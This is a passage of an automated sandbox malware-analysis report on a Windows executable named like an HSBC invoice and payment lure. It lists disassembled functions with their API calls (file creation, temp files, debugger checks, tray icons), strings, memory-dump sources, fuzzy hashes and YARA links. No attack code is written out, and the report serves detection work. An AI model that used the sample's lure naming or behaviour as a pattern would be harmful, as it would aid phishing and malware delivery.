                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: __fread_nolock_memmove
                    • String ID: EA06
                    • API String ID: 1988441806-3962188686
                    • Opcode ID: 39c97bfc987e2714a143be08bc236c9913ca5ffbae4cb049348d50e5040ae9e4
                    • Instruction ID: 1ec6412506eda772fb85e3a7d6a5c3561ae960bdfd798981584c10baf3da6cdc
                    • Opcode Fuzzy Hash: 39c97bfc987e2714a143be08bc236c9913ca5ffbae4cb049348d50e5040ae9e4
                    • Instruction Fuzzy Hash: CA01F9728042586EDB28C7A9C856EEE7BF89B05301F00419AF552E6181E5B9EA048B60
                    Function 00EA0FF6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00EA594C: __FF_MSGBANNER.LIBCMT ref: 00EA5963
                      • Part of subcall function 00EA594C: __NMSG_WRITE.LIBCMT ref: 00EA596A
                      • Part of subcall function 00EA594C: RtlAllocateHeap.NTDLL(011A0000,00000000,00000001), ref: 00EA598F
                    • std::exception::exception.LIBCMT ref: 00EA102C
                    • __CxxThrowException@8.LIBCMT ref: 00EA1041
                      • Part of subcall function 00EA87DB: RaiseException.KERNEL32(?,?,00000000,00F3BAF8,?,00000001,?,?,?,00EA1046,00000000,00F3BAF8,00E89FEC,00000001), ref: 00EA8830
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                    • String ID: bad allocation
                    • API String ID: 3902256705-2104205924
                    • Opcode ID: f1481b3d5945f12ac87aa7071c041834d5af1130b43e6e8efc0e0738c74f75d4
                    • Instruction ID: 4c13c16042ac4d7acf569ff28d1c1d6cb1565db484a41586216332eee09267dd
                    • Opcode Fuzzy Hash: f1481b3d5945f12ac87aa7071c041834d5af1130b43e6e8efc0e0738c74f75d4
                    • Instruction Fuzzy Hash: F3F0283550020DA6CB20BA98ED219DF77EC9F0A390F1010A6FC04FE192DFB0AAD0A2D0
                    Function 00EE9B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                    Download Yara Rule
                    APIs
                    • GetTempPathW.KERNEL32(00000104,?), ref: 00EE9B82
                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00EE9B99
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Temp$FileNamePath
                    • String ID: aut
                    • API String ID: 3285503233-3010740371
                    • Opcode ID: 4a98c16752fc3024537d4b19b4e85ed7adb8a86aad00d27eeb5a3b7e3318a52a
                    • Instruction ID: 69fee3ace9b388d2077fb09752429a4d6a9f993f6a6101262cc6f2fd1bf658f1
                    • Opcode Fuzzy Hash: 4a98c16752fc3024537d4b19b4e85ed7adb8a86aad00d27eeb5a3b7e3318a52a
                    • Instruction Fuzzy Hash: 9BD05E7954030DABDB20DBA0EC0EF9A772CE704700F0042A1BE94910A1DEB0A5989B92
                    Function 00EFCDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 146384811a4323b6fa8ab5f874a23f117d32f88e6b10542de70225693e23a7be
                    • Instruction ID: 3165d98082dca206c2792fdf4ad7bd937148202963aab616366f52e6d3c61a41
                    • Opcode Fuzzy Hash: 146384811a4323b6fa8ab5f874a23f117d32f88e6b10542de70225693e23a7be
                    • Instruction Fuzzy Hash: EFF16E719083059FC714DF28C880A6ABBE5FF88314F14996DF999AB351D731E945CF82
                    Function 00E8F8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00EA03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EA03D3
                      • Part of subcall function 00EA03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00EA03DB
                      • Part of subcall function 00EA03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EA03E6
                      • Part of subcall function 00EA03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EA03F1
                      • Part of subcall function 00EA03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00EA03F9
                      • Part of subcall function 00EA03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00EA0401
                      • Part of subcall function 00E96259: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00E962B4
                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E8FB2D
                    • OleInitialize.OLE32(00000000), ref: 00E8FBAA
                    • CloseHandle.KERNEL32(00000000), ref: 00EC49F2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                    • String ID:
                    • API String ID: 3094916012-0
                    • Opcode ID: cd5821d1cadf0c5e21f774c84d14e4693dbb398b338149a92afb343c7db21794
                    • Instruction ID: 8f2a141738b0ce81484ab6ca98ffe4295d640d5477f8ebe5d884061ded5428a7
                    • Opcode Fuzzy Hash: cd5821d1cadf0c5e21f774c84d14e4693dbb398b338149a92afb343c7db21794
                    • Instruction Fuzzy Hash: 8581A9B89013988ECB84EF39E9446657BE4FBAB718314912ADC19D7372EB314448EF13
                    Function 00E843DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00E84401
                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E844A6
                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E844C3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: IconNotifyShell_$_memset
                    • String ID:
                    • API String ID: 1505330794-0
                    • Opcode ID: 5102a083ead5cb6146017abfc8e58a4517eeb07ccf4aec0512b6e725c34854a5
                    • Instruction ID: 606e45e8797e771796718368d3b99ad1485dfa36d3387c0bfddf570d25888606
                    • Opcode Fuzzy Hash: 5102a083ead5cb6146017abfc8e58a4517eeb07ccf4aec0512b6e725c34854a5
                    • Instruction Fuzzy Hash: 033182B45057059FD720EF24D884697BBE4FB59308F00092EE99ED3290D7B16A48CB52
                    Function 00EA594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __FF_MSGBANNER.LIBCMT ref: 00EA5963
                      • Part of subcall function 00EAA3AB: __NMSG_WRITE.LIBCMT ref: 00EAA3D2
                      • Part of subcall function 00EAA3AB: __NMSG_WRITE.LIBCMT ref: 00EAA3DC
                    • __NMSG_WRITE.LIBCMT ref: 00EA596A
                      • Part of subcall function 00EAA408: GetModuleFileNameW.KERNEL32(00000000,00F443BA,00000104,00000000,00000001,00000000), ref: 00EAA49A
                      • Part of subcall function 00EAA408: ___crtMessageBoxW.LIBCMT ref: 00EAA548
                      • Part of subcall function 00EA32DF: ___crtCorExitProcess.LIBCMT ref: 00EA32E5
                      • Part of subcall function 00EA32DF: ExitProcess.KERNEL32 ref: 00EA32EE
                      • Part of subcall function 00EA8D68: __getptd_noexit.LIBCMT ref: 00EA8D68
                    • RtlAllocateHeap.NTDLL(011A0000,00000000,00000001), ref: 00EA598F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                    • String ID:
                    • API String ID: 1372826849-0
                    • Opcode ID: 7f8b470475e39ede2a03d9f0567936cdc29412baa9bf1f97961626c3a6898981
                    • Instruction ID: 23030575f3f9d229ac55635b7a5e6d0a623a4cf3d815e4f22111f95fa8e2a4d0
                    • Opcode Fuzzy Hash: 7f8b470475e39ede2a03d9f0567936cdc29412baa9bf1f97961626c3a6898981
                    • Instruction Fuzzy Hash: 8B019237200B15DEE6212B74E842B6F72D89F9B774F11203AF921BE191DB70BD019661
                    Function 00EE9B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00EE97D2,?,?,?,?,?,00000004), ref: 00EE9B45
                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00EE97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00EE9B5B
                    • CloseHandle.KERNEL32(00000000,?,00EE97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00EE9B62
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: File$CloseCreateHandleTime
                    • String ID:
                    • API String ID: 3397143404-0
                    • Opcode ID: bd0082582c00835aeba93ab7b3a07e56f743035838e0eafe89c3aa081535ba12
                    • Instruction ID: 55721da648dc94914057bd57881d3c5bbac9887ffb820ab861e0f5ad1880a329
                    • Opcode Fuzzy Hash: bd0082582c00835aeba93ab7b3a07e56f743035838e0eafe89c3aa081535ba12
                    • Instruction Fuzzy Hash: 88E0863228031CB7DB311B54EC09FCA7B58BB05B75F104120FB14790E087B12515A798
                    Function 00EE8F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 00EE8FA5
                      • Part of subcall function 00EA2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA9C64), ref: 00EA2FA9
                      • Part of subcall function 00EA2F95: GetLastError.KERNEL32(00000000,?,00EA9C64), ref: 00EA2FBB
                    • _free.LIBCMT ref: 00EE8FB6
                    • _free.LIBCMT ref: 00EE8FC8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                    • Instruction ID: 422a3eacb65f05cf68fe530505b87f88df683eafee8f3cac2fe3b403e2d38f5c
                    • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                    • Instruction Fuzzy Hash: D6E012B17097494ECA24A57DAE40A9367EF5F4D354718281DB50DFF142DE24F841C128
                    Function 00E8AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID: CALL
                    • API String ID: 0-4196123274
                    • Opcode ID: 5089f4e9c622cbb42b1f95864dfba4afd5155344cc7f30d937a18ff8dfabcfb6
                    • Instruction ID: 6db9a655afff1dcecaee8c624ecccbc4b3ea5068d406cfa8f460b6e268907d55
                    • Opcode Fuzzy Hash: 5089f4e9c622cbb42b1f95864dfba4afd5155344cc7f30d937a18ff8dfabcfb6
                    • Instruction Fuzzy Hash: 3E225874508301CFD724EF14C594B6ABBE1BF44304F19996EE89EAB262D731EC81DB82
                    Function 00E84DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID: EA06
                    • API String ID: 4104443479-3962188686
                    • Opcode ID: 38d40506675c61ebf7631cd8352999967241deb0e3e5622989f339a693f120ef
                    • Instruction ID: e7f373b03c852e17deecc5d826496d211366cf12eebd1b5319409bcaed0958b6
                    • Opcode Fuzzy Hash: 38d40506675c61ebf7631cd8352999967241deb0e3e5622989f339a693f120ef
                    • Instruction Fuzzy Hash: 5B416BB2A046595BCF21BB6488517FE7FE6EB05304F287065FC8EBF2C2D6219D4087A1
                    Function 00E8492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                    Download Yara Rule
                    APIs
                    • 745CC8D0.UXTHEME ref: 00E84992
                      • Part of subcall function 00EA35AC: __lock.LIBCMT ref: 00EA35B2
                      • Part of subcall function 00EA35AC: RtlDecodePointer.NTDLL(00000001), ref: 00EA35BE
                      • Part of subcall function 00EA35AC: RtlEncodePointer.NTDLL(?), ref: 00EA35C9
                      • Part of subcall function 00E84A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E84A73
                      • Part of subcall function 00E84A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E84A88
                      • Part of subcall function 00E83B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E83B7A
                      • Part of subcall function 00E83B4C: IsDebuggerPresent.KERNEL32 ref: 00E83B8C
                      • Part of subcall function 00E83B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00F462F8,00F462E0,?,?), ref: 00E83BFD
                      • Part of subcall function 00E83B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00E83C81
                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E849D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$DebuggerDecodeEncodeFullNamePathPresent__lock
                    • String ID:
                    • API String ID: 2688871447-0
                    • Opcode ID: 9f1984879c6e630f3f98d4758ef9918cb65b7d00b56e9c0d1a06a76fcda1f87d
                    • Instruction ID: 0375b3ff5ce099e75f472d740f4d201bae23a6dc204592ecedafa332d6a7f71b
                    • Opcode Fuzzy Hash: 9f1984879c6e630f3f98d4758ef9918cb65b7d00b56e9c0d1a06a76fcda1f87d
                    • Instruction Fuzzy Hash: 2511C0B1904305AFC700EF68DC4591AFBE8EBAA710F00451EF449972B1DBB09648DB92
                    Function 00E85DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00E85981,?,?,?,?), ref: 00E85E27
                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00E85981,?,?,?,?), ref: 00EBE19C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 8deb3f3c491a76e046140b26bb0603c5387dc5d8d860ba51607cf76dbb76bde4
                    • Instruction ID: eb2a5c216403791512ce214e33ae7deefbc372da663301d808196fcce4300b30
                    • Opcode Fuzzy Hash: 8deb3f3c491a76e046140b26bb0603c5387dc5d8d860ba51607cf76dbb76bde4
                    • Instruction Fuzzy Hash: 9F015671244708BEF7255E24CC86FA6779CAB0576CF108315BAED6A1E0CAB45D498B50
                    Function 00EA582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: __lock_file_memset
                    • String ID:
                    • API String ID: 26237723-0
                    • Opcode ID: 3c93ab6d50e460e709024b6613107062e619f942fbd428889e2923e5788c0a11
                    • Instruction ID: c5b180f7b22ff3d5fe7c46c7d0b2956365c46d923eb7708c8deb52a13ff25773
                    • Opcode Fuzzy Hash: 3c93ab6d50e460e709024b6613107062e619f942fbd428889e2923e5788c0a11
                    • Instruction Fuzzy Hash: 3601D832C00608EBCF21AF658D0249E7BA1AF4A760F045229F8143E161DB359A11DB51
                    Function 00EA55D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00EA8D68: __getptd_noexit.LIBCMT ref: 00EA8D68
                    • __lock_file.LIBCMT ref: 00EA561B
                      • Part of subcall function 00EA6E4E: __lock.LIBCMT ref: 00EA6E71
                    • __fclose_nolock.LIBCMT ref: 00EA5626
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
